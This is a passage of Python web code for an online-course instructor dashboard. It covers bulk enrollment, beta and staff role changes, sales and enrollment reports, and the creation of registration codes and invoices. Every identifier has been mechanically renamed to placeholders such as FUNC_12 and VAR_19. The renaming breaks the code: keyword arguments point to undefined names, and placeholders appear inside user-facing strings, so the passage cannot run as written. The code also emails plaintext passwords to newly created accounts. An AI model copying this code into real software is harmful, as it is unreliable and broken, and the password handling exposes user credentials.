def FUNC_10(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18):
VAR_19 = User.objects.create_user(VAR_15, VAR_14, VAR_18)
VAR_53 = Registration()
VAR_53.register(VAR_19)
VAR_54 = UserProfile(VAR_19=user)
VAR_54.name = VAR_16
VAR_54.country = VAR_17
VAR_54.save()
return VAR_19
def FUNC_11(VAR_19, VAR_10, VAR_20, VAR_21, VAR_22, VAR_23):
VAR_55 = CourseEnrollment.enroll(VAR_19, VAR_10, VAR_20=mode)
ManualEnrollmentAudit.create_manual_enrollment_audit(
VAR_21, VAR_19.email, VAR_23, VAR_22, VAR_55
)
VAR_0.info(u'user %s enrolled in the VAR_65 %s', VAR_19.username, VAR_10)
return VAR_55
def FUNC_12(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18, VAR_10, VAR_24, VAR_21, VAR_25):
VAR_56 = list()
try:
with transaction.atomic():
VAR_19 = FUNC_10(VAR_14, VAR_15, VAR_16, VAR_17, VAR_18)
FUNC_11(
VAR_19=VAR_19,
VAR_10=course_id,
VAR_20=VAR_24,
VAR_21=enrolled_by,
VAR_22='Enrolling via VAR_26 upload',
VAR_23=UNENROLLED_TO_ENROLLED,
)
except IntegrityError:
VAR_56.append({
'username': VAR_15, 'email': VAR_14, 'response': _('Username {VAR_19} already exists.').format(VAR_19=VAR_15)
})
except Exception as ex: # pylint: disable=broad-except
VAR_0.exception(type(ex).__name__)
VAR_56.append({
'username': VAR_15, 'email': VAR_14, 'response': type(ex).__name__,
})
else:
try:
VAR_25.update({
'message': 'account_creation_and_enrollment',
'email_address': VAR_14,
'password': VAR_18,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
})
send_mail_to_student(VAR_14, VAR_25)
except Exception as ex: # pylint: disable=broad-except
VAR_0.exception(
"Exception '{VAR_154}' raised while sending VAR_14 to new VAR_19.".format(VAR_154=type(ex).__name__)
)
VAR_56.append({
'username': VAR_15,
'email': VAR_14,
'response':
_("Error '{VAR_169}' while sending VAR_14 to new VAR_19 (user VAR_14={email}). "
"Without the VAR_14 VAR_40 would not be able to login. "
"Please contact support for further information.").format(VAR_169=type(ex).__name__, VAR_14=email),
})
else:
VAR_0.info(u'email sent to new VAR_149 VAR_19 at %s', VAR_14)
return VAR_56
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_2(VAR_57="enroll or unenroll", VAR_59="stringified list of VAR_133 and/or usernames")
def FUNC_13(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_57 = VAR_9.POST.get('action')
VAR_58 = VAR_9.POST.get('identifiers')
VAR_59 = FUNC_64(VAR_58)
VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
VAR_62 = CourseMode.is_white_label(VAR_10)
VAR_22 = VAR_9.POST.get('reason')
if VAR_62:
if not VAR_22:
return JsonResponse(
{
'action': VAR_57,
'results': [{'error': True}],
'auto_enroll': VAR_60,
}, status=400)
VAR_55 = None
VAR_23 = DEFAULT_TRANSITION_STATE
VAR_25 = {}
if VAR_61:
VAR_65 = get_course_by_id(VAR_10)
VAR_25 = get_email_params(VAR_65, VAR_60, VAR_168=VAR_9.is_secure())
VAR_51 = []
for identifier in VAR_59:
VAR_19 = None
VAR_14 = None
VAR_167 = None
try:
VAR_19 = get_student_from_identifier(identifier)
except User.DoesNotExist:
VAR_14 = identifier
else:
VAR_14 = VAR_19.email
VAR_167 = get_user_email_language(VAR_19)
try:
validate_email(VAR_14) # Raises ValidationError if invalid
if VAR_57 == 'enroll':
VAR_200, VAR_201, VAR_55 = enroll_email(
VAR_10, VAR_14, VAR_60, VAR_61, VAR_25, VAR_167=language
)
VAR_202 = VAR_200.to_dict()['enrollment']
VAR_203 = VAR_200.to_dict()['user']
VAR_204 = VAR_200.to_dict()['allowed']
VAR_205 = VAR_201.to_dict()['enrollment']
VAR_206 = VAR_201.to_dict()['allowed']
if VAR_203:
if VAR_205:
if VAR_202:
VAR_23 = ENROLLED_TO_ENROLLED
else:
if VAR_204:
VAR_23 = ALLOWEDTOENROLL_TO_ENROLLED
else:
VAR_23 = UNENROLLED_TO_ENROLLED
else:
if VAR_206:
VAR_23 = UNENROLLED_TO_ALLOWEDTOENROLL
elif VAR_57 == 'unenroll':
VAR_200, VAR_201 = unenroll_email(
VAR_10, VAR_14, VAR_61, VAR_25, VAR_167=language
)
VAR_202 = VAR_200.to_dict()['enrollment']
VAR_204 = VAR_200.to_dict()['allowed']
VAR_55 = CourseEnrollment.get_enrollment(VAR_19, VAR_10)
if VAR_202:
VAR_23 = ENROLLED_TO_UNENROLLED
else:
if VAR_204:
VAR_23 = ALLOWEDTOENROLL_TO_UNENROLLED
else:
VAR_23 = UNENROLLED_TO_UNENROLLED
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_57 '{}'".format(VAR_57)
))
except ValidationError:
VAR_51.append({
'identifier': identifier,
'invalidIdentifier': True,
})
except Exception as exc: # pylint: disable=broad-except
VAR_0.exception(u"Error while #{}ing student")
VAR_0.exception(exc)
VAR_51.append({
'identifier': identifier,
'error': True,
})
else:
ManualEnrollmentAudit.create_manual_enrollment_audit(
VAR_9.user, VAR_14, VAR_23, VAR_22, VAR_55
)
VAR_51.append({
'identifier': identifier,
'before': VAR_200.to_dict(),
'after': VAR_201.to_dict(),
})
VAR_63 = {
'action': VAR_57,
'results': VAR_51,
'auto_enroll': VAR_60,
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
@FUNC_2(
VAR_59="stringified list of VAR_133 and/or usernames",
VAR_57="add or remove",
)
def FUNC_14(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_57 = VAR_9.POST.get('action')
VAR_58 = VAR_9.POST.get('identifiers')
VAR_59 = FUNC_64(VAR_58)
VAR_61 = VAR_9.POST.get('email_students') in ['true', 'True', True]
VAR_60 = VAR_9.POST.get('auto_enroll') in ['true', 'True', True]
VAR_51 = []
VAR_64 = 'beta'
VAR_65 = get_course_by_id(VAR_10)
VAR_25 = {}
if VAR_61:
VAR_168 = VAR_9.is_secure()
VAR_25 = get_email_params(VAR_65, VAR_60=auto_enroll, VAR_168=secure)
for identifier in VAR_59:
try:
VAR_169 = False
VAR_195 = False
VAR_19 = get_student_from_identifier(identifier)
if VAR_57 == 'add':
allow_access(VAR_65, VAR_19, VAR_64)
elif VAR_57 == 'remove':
revoke_access(VAR_65, VAR_19, VAR_64)
else:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_57 '{}'".format(VAR_57)
))
except User.DoesNotExist:
VAR_169 = True
VAR_195 = True
except Exception as exc: # pylint: disable=broad-except
VAR_0.exception(u"Error while #{}ing student")
VAR_0.exception(exc)
VAR_169 = True
else:
if VAR_61:
send_beta_role_email(VAR_57, VAR_19, VAR_25)
if VAR_60:
if not CourseEnrollment.is_enrolled(VAR_19, VAR_10):
CourseEnrollment.enroll(VAR_19, VAR_10)
finally:
VAR_51.append({
'identifier': identifier,
'error': VAR_169,
'userDoesNotExist': VAR_195
})
VAR_63 = {
'action': VAR_57,
'results': VAR_51,
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_0
@FUNC_1(
VAR_141="email or VAR_15 of VAR_19 to change access",
VAR_64="'instructor', 'staff', 'beta', or 'ccx_coach'",
VAR_57="'allow' or 'revoke'"
)
def FUNC_15(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'instructor', VAR_10, depth=None
)
try:
VAR_19 = get_student_from_identifier(VAR_9.GET.get('unique_student_identifier'))
except User.DoesNotExist:
VAR_63 = {
'unique_student_identifier': VAR_9.GET.get('unique_student_identifier'),
'userDoesNotExist': True,
}
return JsonResponse(VAR_63)
if not VAR_19.is_active:
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'inactiveUser': True,
}
return JsonResponse(VAR_63)
VAR_64 = VAR_9.GET.get('rolename')
VAR_57 = VAR_9.GET.get('action')
if VAR_64 not in ROLES:
VAR_169 = strip_tags("unknown VAR_64 '{}'".format(VAR_64))
VAR_0.error(VAR_169)
return HttpResponseBadRequest(VAR_169)
if VAR_64 == 'instructor' and VAR_19 == VAR_9.user and VAR_57 != 'allow':
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'rolename': VAR_64,
'action': VAR_57,
'removingSelfAsInstructor': True,
}
return JsonResponse(VAR_63)
if VAR_57 == 'allow':
allow_access(VAR_65, VAR_19, VAR_64)
elif VAR_57 == 'revoke':
revoke_access(VAR_65, VAR_19, VAR_64)
else:
return HttpResponseBadRequest(strip_tags(
"unrecognized VAR_57 '{}'".format(VAR_57)
))
VAR_63 = {
'unique_student_identifier': VAR_19.username,
'rolename': VAR_64,
'action': VAR_57,
'success': 'yes',
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('instructor')
@FUNC_1(VAR_64="'instructor', 'staff', or 'beta'")
def FUNC_16(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'instructor', VAR_10, depth=None
)
VAR_64 = VAR_9.GET.get('rolename')
if VAR_64 not in ROLES:
return HttpResponseBadRequest()
def FUNC_85(VAR_19):
return {
'username': VAR_19.username,
'email': VAR_19.email,
'first_name': VAR_19.first_name,
'last_name': VAR_19.last_name,
}
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
VAR_64: map(FUNC_85, list_with_level(
VAR_65, VAR_64
)),
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_17(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_66 = VAR_9.GET.get('problem_location', '')
try:
VAR_170 = UsageKey.from_string(VAR_66)
VAR_171 = VAR_170.run
if not VAR_171:
VAR_170 = VAR_38.make_usage_key_from_deprecated_string(VAR_66)
if VAR_170.course_key != VAR_38:
raise InvalidKeyError(type(VAR_170), problem_key)
except InvalidKeyError:
return JsonResponseBadRequest(_("Could not find problem with this location."))
try:
instructor_task.api.submit_calculate_problem_responses_csv(VAR_9, VAR_38, VAR_66)
VAR_172 = _(
"The problem responses report is being VAR_149."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"A problem responses report generation VAR_150 is already in progress. "
"Check the 'Pending Tasks' table for the status of the VAR_150. "
"When completed, the report will be available for download in the table below."
)
return JsonResponse({"status": VAR_196})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_18(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_with_access(
VAR_9.user, 'staff', VAR_10, depth=None
)
VAR_67 = instructor_analytics.basic.dump_grading_context(VAR_65)
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'grading_config_summary': VAR_67,
}
return JsonResponse(VAR_63)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_19(VAR_9, VAR_10, VAR_26=False): # pylint: disable=unused-argument, redefined-outer-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_68 = [
'company_name', 'company_contact_name', 'company_contact_email', 'total_codes', 'total_used_codes',
'total_amount', 'created', 'customer_reference_number', 'recipient_name', 'recipient_email', 'created_by',
'internal_reference', 'invoice_number', 'codes', 'course_id'
]
VAR_69 = instructor_analytics.basic.sale_record_features(VAR_10, VAR_68)
if not VAR_26:
for VAR_197 in VAR_69:
VAR_197['created_by'] = VAR_197['created_by'].username
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'sale': VAR_69,
'queried_features': VAR_68
}
return JsonResponse(VAR_63)
else:
VAR_86, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_68)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_invoice_records.csv", VAR_86, VAR_73)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_20(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_68 = [
('id', 'Order Id'),
('company_name', 'Company Name'),
('company_contact_name', 'Company Contact Name'),
('company_contact_email', 'Company Contact Email'),
('logged_in_username', 'Login Username'),
('logged_in_email', 'Login User Email'),
('purchase_time', 'Date of Sale'),
('customer_reference_number', 'Customer Reference Number'),
('recipient_name', 'Recipient Name'),
('recipient_email', 'Recipient Email'),
('bill_to_street1', 'Street 1'),
('bill_to_street2', 'Street 2'),
('bill_to_city', 'City'),
('bill_to_state', 'State'),
('bill_to_postalcode', 'Postal Code'),
('bill_to_country', 'Country'),
('order_type', 'Order Type'),
('status', 'Order Item Status'),
('coupon_code', 'Coupon Code'),
('list_price', 'List Price'),
('unit_cost', 'Unit Price'),
('quantity', 'Quantity'),
('total_discount', 'Total Discount'),
('total_amount', 'Total Amount Paid'),
]
VAR_70 = [x[0] for x in VAR_68]
VAR_71 = [x[1] for x in VAR_68]
VAR_69 = instructor_analytics.basic.sale_order_record_features(VAR_10, VAR_70)
VAR_72, VAR_73 = instructor_analytics.csvs.format_dictlist(VAR_69, VAR_70)
return instructor_analytics.csvs.create_csv_response("e-commerce_sale_order_records.csv", VAR_71, VAR_73)
@FUNC_3('staff')
@require_POST
def FUNC_21(VAR_9, VAR_10):
try:
VAR_173 = VAR_9.POST["invoice_number"]
except KeyError:
return HttpResponseBadRequest("Missing required VAR_173 parameter")
try:
VAR_173 = int(VAR_173)
except ValueError:
return HttpResponseBadRequest(
"invoice_number must be an integer, {value} provided".format(
value=VAR_173
)
)
try:
VAR_174 = VAR_9.POST["event_type"]
except KeyError:
return HttpResponseBadRequest("Missing required VAR_174 parameter")
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
VAR_27 = CourseRegistrationCodeInvoiceItem.objects.select_related('invoice').get(
invoice_id=VAR_173,
VAR_10=course_id
)
VAR_27 = VAR_27.invoice
except CourseRegistrationCodeInvoiceItem.DoesNotExist: # Check for old type invoices
return HttpResponseNotFound(_("Invoice number '{num}' does not exist.").format(num=VAR_173))
if VAR_174 == "invalidate":
return FUNC_22(VAR_27)
else:
return FUNC_23(VAR_27)
def FUNC_22(VAR_27):
if not VAR_27.is_valid:
return HttpResponseBadRequest(_("The sale associated with this VAR_29 has already been invalidated."))
VAR_27.is_valid = False
VAR_27.save()
VAR_74 = _('Invoice number {0} has been invalidated.').format(VAR_27.id)
return JsonResponse({'message': VAR_74})
def FUNC_23(VAR_27):
if VAR_27.is_valid:
return HttpResponseBadRequest(_("This VAR_29 is already active."))
VAR_27.is_valid = True
VAR_27.save()
VAR_74 = _('The registration codes for VAR_29 {0} have been re-activated.').format(VAR_27.id)
return JsonResponse({'message': VAR_74})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_24(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_75 = VAR_9.GET.get('csv', 'false')
VAR_68 = ['course_id', 'mode', 'total_issued_certificate', 'report_run_date']
VAR_76 = [
('course_id', _('CourseID')),
('mode', _('Certificate Type')),
('total_issued_certificate', _('Total Certificates Issued')),
('report_run_date', _('Date Report Run'))
]
VAR_77 = instructor_analytics.basic.issued_certificates(VAR_38, VAR_68)
if VAR_75.lower() == 'true':
VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_77, VAR_68)
return instructor_analytics.csvs.create_csv_response(
'issued_certificates.csv',
[col_header for VAR_72, col_header in VAR_76],
VAR_81
)
else:
VAR_63 = {
'certificates': VAR_77,
'queried_features': VAR_68,
'feature_names': dict(VAR_76)
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_25(VAR_9, VAR_10, VAR_26=False): # pylint: disable=redefined-outer-VAR_16
VAR_38 = CourseKey.from_string(VAR_10)
VAR_65 = get_course_by_id(VAR_38)
VAR_78 = instructor_analytics.basic.AVAILABLE_FEATURES
VAR_68 = list(microsite.get_value('student_profile_download_fields', []))
if not VAR_68:
query_features = [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals',
]
VAR_76 = {
'id': _('User ID'),
'username': _('Username'),
'name': _('Name'),
'email': _('Email'),
'language': _('Language'),
'location': _('Location'),
'year_of_birth': _('Birth Year'),
'gender': _('Gender'),
'level_of_education': _('Level of Education'),
'mailing_address': _('Mailing Address'),
'goals': _('Goals'),
}
if is_course_cohorted(VAR_65.id):
VAR_68.append('cohort')
VAR_76['cohort'] = _('Cohort')
if VAR_65.teams_enabled:
VAR_68.append('team')
VAR_76['team'] = _('Team')
VAR_68.append('city')
VAR_76['city'] = _('City')
VAR_68.append('country')
VAR_76['country'] = _('Country')
if not VAR_26:
VAR_175 = instructor_analytics.basic.enrolled_students_features(VAR_38, VAR_68)
VAR_63 = {
'course_id': unicode(VAR_38),
'students': VAR_175,
'students_count': len(VAR_175),
'queried_features': VAR_68,
'feature_names': VAR_76,
'available_features': VAR_78,
}
return JsonResponse(VAR_63)
else:
try:
instructor_task.api.submit_calculate_students_features_csv(VAR_9, VAR_38, VAR_68)
VAR_172 = _("The enrolled learner VAR_54 report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"This enrollment report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_26(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_68 = ['email']
try:
instructor_task.api.submit_calculate_may_enroll_csv(VAR_9, VAR_38, VAR_68)
VAR_172 = _(
"The enrollment report is being VAR_149. This report contains"
" information about learners who can enroll in the VAR_65."
" To view the status of the report, see Pending Tasks below."
)
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"This enrollment report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@FUNC_3('staff')
def FUNC_27(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_string(VAR_10)
try:
def FUNC_88(VAR_176, VAR_177):
with VAR_176.open(VAR_177) as f:
VAR_207 = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
try:
VAR_210 = next(VAR_207)
except StopIteration:
VAR_210 = []
VAR_180 = None
if "cohort" not in VAR_210:
VAR_180 = _("The file must contain a 'cohort' column containing cohort names.")
elif "email" not in VAR_210 and "username" not in VAR_210:
VAR_180 = _("The file must contain a 'username' column, an 'email' column, or both.")
if VAR_180:
raise FileValidationException(VAR_180)
VAR_72, VAR_123 = store_uploaded_file(
VAR_9, 'uploaded-file', ['.csv'],
course_and_time_based_filename_generator(VAR_38, "cohorts"),
max_file_size=2000000, # limit to 2 MB
FUNC_88=validator
)
instructor_task.api.submit_cohort_students(VAR_9, VAR_38, VAR_123)
except (FileValidationException, PermissionDenied) as err:
return JsonResponse({"error": unicode(err)}, status=400)
return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_28(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_79 = Coupon.objects.filter(VAR_10=course_id)
VAR_68 = [
('code', _('Coupon Code')),
('course_id', _('Course Id')),
('percentage_discount', _('% Discount')),
('description', _('Description')),
('expiration_date', _('Expiration Date')),
('is_active', _('Is Active')),
('code_redeemed_count', _('Code Redeemed Count')),
('total_discounted_seats', _('Total Discounted Seats')),
('total_discounted_amount', _('Total Discounted Amount')),
]
VAR_70 = [x[0] for x in VAR_68]
VAR_71 = [x[1] for x in VAR_68]
VAR_80 = instructor_analytics.basic.coupon_codes_features(VAR_70, VAR_79, VAR_10)
VAR_72, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_80, VAR_70)
return instructor_analytics.csvs.create_csv_response('Coupons.csv', VAR_71, VAR_81)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_29(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_detailed_enrollment_features_csv(VAR_9, VAR_38)
VAR_172 = _("The detailed enrollment report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("The detailed enrollment report is being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": VAR_196
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@FUNC_6
def FUNC_30(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_executive_summary_report(VAR_9, VAR_38)
VAR_178 = _("The executive summary report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The executive summary report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_31(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_course_survey_report(VAR_9, VAR_38)
VAR_178 = _("The survey report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The survey report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
def FUNC_32(VAR_9, VAR_10):
VAR_68 = [
'user_email',
'exam_name',
'attempt_code',
'allowed_time_limit_mins',
'is_sample_attempt',
'started_at',
'completed_at',
'status',
]
VAR_38 = CourseKey.from_string(VAR_10)
try:
instructor_task.api.submit_proctored_exam_results_report(VAR_9, VAR_38, VAR_68)
VAR_178 = _("The proctored exam VAR_51 report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
VAR_178 = _(
"The proctored exam VAR_51 report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": VAR_178
})
def FUNC_33(VAR_19, VAR_10, VAR_28, VAR_29=None, VAR_30=None, VAR_31=None):
VAR_82 = FUNC_35()
VAR_83 = Coupon.objects.filter(VAR_82=code, is_active=True)
if VAR_83:
return FUNC_33(
VAR_19, VAR_10, VAR_28, VAR_29=invoice, VAR_30=order, VAR_31=invoice_item
)
VAR_84 = CourseRegistrationCode(
VAR_82=code,
VAR_10=unicode(VAR_10),
created_by=VAR_19,
VAR_29=invoice,
VAR_30=order,
VAR_28=mode_slug,
VAR_31=invoice_item
)
try:
with transaction.atomic():
VAR_84.save()
return VAR_84
except IntegrityError:
return FUNC_33(
VAR_19, VAR_10, VAR_28, VAR_29=invoice, VAR_30=order, VAR_31=invoice_item
)
def FUNC_34(VAR_32, VAR_33, VAR_34=None):
VAR_68 = [
'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
]
VAR_85 = instructor_analytics.basic.course_registration_features(VAR_68, VAR_33, VAR_34)
VAR_86, VAR_81 = instructor_analytics.csvs.format_dictlist(VAR_85, VAR_68)
return instructor_analytics.csvs.create_csv_response(VAR_32, VAR_86, VAR_81)
def FUNC_35():
VAR_87 = getattr(settings, 'REGISTRATION_CODE_LENGTH', 8)
return FUNC_8(VAR_87)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3('staff')
@require_POST
def FUNC_36(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_85 = CourseRegistrationCode.objects.filter(
VAR_10=course_id
).order_by('invoice_item__invoice__company_name')
VAR_88 = VAR_9.POST['download_company_name']
if VAR_88:
VAR_85 = registration_codes.filter(invoice_item__invoice__company_name=VAR_88)
VAR_34 = 'download'
return FUNC_34("Registration_Codes.csv", VAR_85, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_5
@require_POST
def FUNC_37(VAR_9, VAR_10):
VAR_10 = CourseKey.from_string(VAR_10)
VAR_89 = False
try:
VAR_179 = int(VAR_9.POST['total_registration_codes'])
except ValueError:
VAR_179 = int(float(VAR_9.POST['total_registration_codes']))
VAR_88 = VAR_9.POST['company_name']
VAR_90 = VAR_9.POST['company_contact_name']
VAR_91 = VAR_9.POST['company_contact_email']
VAR_92 = VAR_9.POST['unit_price']
try:
VAR_92 = (
decimal.Decimal(VAR_92)
).quantize(
decimal.Decimal('.01'),
rounding=decimal.ROUND_DOWN
)
except decimal.InvalidOperation:
return HttpResponse(
status=400,
content=_(u"Could not parse amount as a decimal")
)
VAR_93 = VAR_9.POST['recipient_name']
VAR_94 = VAR_9.POST['recipient_email']
VAR_95 = VAR_9.POST['address_line_1']
VAR_96 = VAR_9.POST['address_line_2']
VAR_97 = VAR_9.POST['address_line_3']
VAR_98 = VAR_9.POST['city']
VAR_99 = VAR_9.POST['state']
VAR_100 = VAR_9.POST['zip']
VAR_17 = VAR_9.POST['country']
VAR_101 = VAR_9.POST['internal_reference']
VAR_102 = VAR_9.POST['customer_reference_number']
VAR_103 = [VAR_94]
if VAR_9.POST.get('invoice', False):
VAR_103.append(VAR_9.user.email)
VAR_89 = True
VAR_104 = VAR_92 * VAR_179
set_user_preference(VAR_9.user, INVOICE_KEY, VAR_89)
VAR_105 = Invoice.objects.create(
total_amount=VAR_104,
VAR_88=company_name,
VAR_91=company_contact_email,
VAR_90=company_contact_name,
VAR_10=course_id,
VAR_93=recipient_name,
VAR_94=recipient_email,
VAR_95=address_line_1,
VAR_96=address_line_2,
VAR_97=address_line_3,
VAR_98=city,
VAR_99=state,
zip=VAR_100,
VAR_17=country,
VAR_101=internal_reference,
VAR_102=customer_reference_number
)
VAR_31 = CourseRegistrationCodeInvoiceItem.objects.create(
VAR_29=VAR_105,
qty=VAR_179,
VAR_92=unit_price,
VAR_10=course_id
)
VAR_65 = get_course_by_id(VAR_10, depth=0)
VAR_106 = CourseMode.paid_modes_for_course(VAR_10)
if len(VAR_106) != 1:
VAR_180 = (
u"Generating Code Redeem Codes for Course '{VAR_10}', which must have a single paid VAR_65 VAR_20. "
u"This is a configuration issue. Current VAR_65 modes with payment options: {VAR_106}"
).format(VAR_10=course_id, VAR_106=paid_modes)
VAR_0.error(VAR_180)
return HttpResponse(
status=500,
content=_(u"Unable to generate redeem codes because of VAR_65 misconfiguration.")
)
VAR_24 = VAR_106[0]
VAR_107 = VAR_24.min_price
VAR_85 = []
for VAR_72 in range(VAR_179):
VAR_181 = FUNC_33(
VAR_9.user, VAR_10, VAR_24.slug, VAR_29=VAR_105, VAR_30=None, VAR_31=invoice_item
)
VAR_85.append(VAR_181)
VAR_108 = microsite.get_value('SITE_NAME', 'localhost')
VAR_109 = VAR_179
VAR_110 = (float(VAR_109 * VAR_107) - float(VAR_104))
VAR_111 = '{base_url}{course_about}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
course_about=reverse('about_course', VAR_3={'course_id': VAR_10.to_deprecated_string()})
)
VAR_112 = '{base_url}{dashboard}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
dashboard=reverse('dashboard')
)
try:
VAR_182 = VAR_105.generate_pdf_invoice(VAR_65, VAR_107, int(VAR_109), float(VAR_104))
except Exception: # pylint: disable=broad-except
VAR_0.exception('Exception at creating pdf file.')
VAR_182 = None
VAR_113 = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
VAR_114 = {
'invoice': VAR_105,
'site_name': VAR_108,
'course': VAR_65,
'course_price': VAR_107,
'sub_total': VAR_107 * VAR_109,
'discount': VAR_110,
'sale_price': VAR_104,
'quantity': VAR_109,
'registration_codes': VAR_85,
